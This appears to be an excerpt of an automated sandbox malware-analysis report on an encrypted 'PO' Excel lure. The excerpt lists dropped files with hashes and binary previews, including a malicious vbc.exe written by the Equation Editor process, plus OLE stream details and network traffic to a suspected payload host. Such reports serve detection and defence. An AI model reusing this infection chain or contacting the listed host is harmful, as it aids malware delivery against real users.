                                                                                                                                                            Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................z$...<..-z.z.@..%......\.........@...N.P..........(......N.P...... ....y.z...... .........c..z.z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........L..X...............c....vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4C3E111.jpeg
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):85020
                                                                                                                                                            Entropy (8bit):7.2472785111025875
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                            MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                            SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                            SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                            SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3B800A.jpeg
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):62140
                                                                                                                                                            Entropy (8bit):7.529847875703774
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                            MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                            SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                            SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                            SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3AC9EED.jpeg
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):85020
                                                                                                                                                            Entropy (8bit):7.2472785111025875
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                            MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                            SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                            SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                            SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5037C83.png
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11303
                                                                                                                                                            Entropy (8bit):7.909402464702408
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                            MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                            SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                            SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                            SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED031647.png
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11303
                                                                                                                                                            Entropy (8bit):7.909402464702408
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                            MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                            SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                            SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                            SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE19B150.emf
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):7608
                                                                                                                                                            Entropy (8bit):5.084930921757286
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:+SSf1FL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5SdvjU+H3tWa6WdTfOYLpR8d
                                                                                                                                                            MD5:C2665932D72E3E1FCC9C4DF0E7CC55A0
                                                                                                                                                            SHA1:38EB914256D13088E85D9B29C92BA259F914D811
                                                                                                                                                            SHA-256:655637B2DC718152CBA41C08847FE24CC00A5E8D97231D453A5B2E692125C787
                                                                                                                                                            SHA-512:C419E80E96307D0A60945B93ACF776085D2B0BC0684B7C34A7D71D776A18D4C5A8379431DC09197ECB8897553175BFB3737286855E9F164B34319A84E659FE55
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....Q.d...................../.../....p....\...../......./.,./....p....../..6Pv...p....`..p0...$y.v.H....1......./....v....$.......d.......d./..^.p.....^.p.G...H..@.f...1.-...../..<.v................<.>v.Z.v....X..R....0..........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NYDA3AU4HKQUVWBPSARJ.temp
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8016
                                                                                                                                                            Entropy (8bit):3.584756671518262
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:chQCAMqbqvsqvJCwo0z8hQCAMqbqvsEHyqvJCworez2gYkH3QhHQlUVaIu:cGao0z8GiHnorez2YQhHmIu
                                                                                                                                                            MD5:C2D28DD526BF8928F96F3C55BF8CDF5E
                                                                                                                                                            SHA1:BCC486EB8A91B3D46C75497DBBB23B561A19B53F
                                                                                                                                                            SHA-256:FAB8166C58988D4EAC75A76BC3A77260D7E0D623C31615533740346125619004
                                                                                                                                                            SHA-512:F7EDD31A821EAC5DCD6CD3BD89C5DFBA9E7D00A02204D0F6BB3DE1438E655F8CE3D6916049E5D51BD9D8551EA3FEC7C24CCEDBB948EDB9DA9E4DAEE295AE6A46
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                                                            C:\Users\user\Desktop\~$PO20210722.xlsx
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):330
                                                                                                                                                            Entropy (8bit):1.4377382811115937
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                            MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                            SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                            SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                            SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            C:\Users\Public\vbc.exe
                                                                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):26624
                                                                                                                                                            Entropy (8bit):6.055482508518817
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:ko9xN+bR7ftwwAqCnv/sx3OfEbR7t6ll:nPwbR8t/3MR7AP
                                                                                                                                                            MD5:F5041EC4CE468A07ECBFD076BC0F879B
                                                                                                                                                            SHA1:BDA8CEA1EC8D1CEA253FC661559CD84CEE2195B9
                                                                                                                                                            SHA-256:CAFF14D450514A35EAC5BA34B3E74126360662D7C8FDF60A8008A0E3BB8ED0B3
                                                                                                                                                            SHA-512:4E64A727DA994675AA7517F260D639691F6A94BC9C510DDDE9D54F2F6E7F005B8B799EEEA1D9AAD1DC5128290654FA884A4AA0E397F96444914A067B8BD15C88
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 20%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 57%
                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                            • Filename: PO20210719.docx, Detection: malicious, Browse
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h..`..........'..........H................@............................................... .............................................................P...p............................................P..(....................................................text...(...........................`.P`.data........0......."..............@.P..rdata..0....@.......$..............@.`@.pdata..p....`.......:..............@.0@.xdata.......p.......>..............@.0@.bss..................................`..idata...............@..............@.0..CRT....h............H..............@.@..tls.................J..............@.@..vmp0................L..............`..h.cobf................\..........................................................................................................................................................................................

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:CDFV2 Encrypted
                                                                                                                                                            Entropy (8bit):7.99479494181637
                                                                                                                                                            TrID:
                                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                            File name:PO20210722.xlsx
                                                                                                                                                            File size:1296896
                                                                                                                                                            MD5:67a1fadce73f871b43fcb1f4f587e800
                                                                                                                                                            SHA1:65ba350a884b5c06c17d232c244de610e2305091
                                                                                                                                                            SHA256:4ce9b6af73b53e943f97c68254a1562e4a944403a353146cc8e99a62a8d74314
                                                                                                                                                            SHA512:cf95b8df8e303c95507d9abc6a6418956aa0d784588ea6a17e22f4fc0047358c5b6c6f90683180f211f1f003ab79ff29a3b56e3e6ae2d7169b0b4cc9a51190f8
                                                                                                                                                            SSDEEP:24576:Xg7E7dCIpI9hNIdpXcq621HOBg1KamJrERWkvqU6szeX04Jdy9koY5g:iTmmhEcg179P9cLQ
                                                                                                                                                            File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                            Static OLE Info

                                                                                                                                                            General

                                                                                                                                                            Document Type:OLE
                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                            OLE File "PO20210722.xlsx"

                                                                                                                                                            Indicators

                                                                                                                                                            Has Summary Info:False
                                                                                                                                                            Application Name:unknown
                                                                                                                                                            Encrypted Document:True
                                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                                            Contains Workbook/Book Stream:False
                                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                            Flash Objects Count:
                                                                                                                                                            Contains VBA Macros:False

                                                                                                                                                            Streams

                                                                                                                                                            Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:64
                                                                                                                                                            Entropy:2.73637206947
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                            Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                            Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:112
                                                                                                                                                            Entropy:2.7597816111
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                            Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                            Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:200
                                                                                                                                                            Entropy:3.13335930328
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                            Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x6DataSpaces/Version
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:76
                                                                                                                                                            Entropy:2.79079600998
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                            Stream Path: EncryptedPackage, File Type: data, Stream Size: 1282936
                                                                                                                                                            General
                                                                                                                                                            Stream Path:EncryptedPackage
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:1282936
                                                                                                                                                            Entropy:7.9988688056
                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                            Data ASCII:h . . . . . . . . . F e . . . . o . ; . . _ . } . 7 . } . g . . v . . / . ] . + . . { . . . . ; . L . = . . E 0 . ) y l . . d . . % E . . . R } . . . $ 4 . . . f . ] . . h M 5 . . . $ 4 . . . f . ] . . h M 5 . . . $ 4 . . . f . ] . . h M 5 . . . $ 4 . . . f . ] . . h M 5 . . . $ 4 . . . f . ] . . h M 5 . . . $ 4 . . . f . ] . . h M 5 . . . $ 4 . . . f . ] . . h M 5 . . . $ 4 . . . f . ] . . h M 5 . . . $ 4 . . . f . ] . . h M 5 . . . $ 4 . . . f . ] . . h M 5 . . . $ 4 . . . f . ] . . h M 5 . . . $ 4 . . .
                                                                                                                                                            Data Raw:68 93 13 00 00 00 00 00 ff fd 46 65 18 80 1a 0b 6f de 3b 98 0c 5f a4 7d 8a 37 e5 7d 83 67 8f cd 76 a3 d0 2f a5 5d 8a 2b 04 13 7b 1a e9 ba fc 3b f3 4c c4 3d d4 d8 45 30 e2 29 79 6c d9 85 64 b5 e5 25 45 e3 e0 c0 52 7d c9 1d b4 24 34 d6 ab 1d 66 06 5d f1 ed 68 4d 35 c9 1d b4 24 34 d6 ab 1d 66 06 5d f1 ed 68 4d 35 c9 1d b4 24 34 d6 ab 1d 66 06 5d f1 ed 68 4d 35 c9 1d b4 24 34 d6 ab 1d
                                                                                                                                                            Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                            General
                                                                                                                                                            Stream Path:EncryptionInfo
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:224
                                                                                                                                                            Entropy:4.47571952038
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . W . . . . . . g o . . . i N . R u . . . . M " . 5 . . . . D . . . . . . . . . - " . . . C Y . u . . . 0 . . . . D . . . . x . . l & j
                                                                                                                                                            Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                            Network Behavior

                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                            07/22/21-17:18:28.067536ICMP382ICMP PING Windows192.168.2.22216.58.215.238
                                                                                                                                                            07/22/21-17:18:28.067536ICMP384ICMP PING192.168.2.22216.58.215.238
                                                                                                                                                            07/22/21-17:18:28.110430ICMP408ICMP Echo Reply216.58.215.238192.168.2.22

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jul 22, 2021 17:18:18.885015965 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.022680998 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.022875071 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.023350000 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.164860010 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.164891958 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.164912939 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.164948940 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.171257973 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.308545113 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308584929 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308602095 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308614016 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308625937 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308639050 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308650970 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308669090 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.311108112 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.311132908 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.311136961 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.311139107 CEST4916580192.168.2.22172.245.119.43
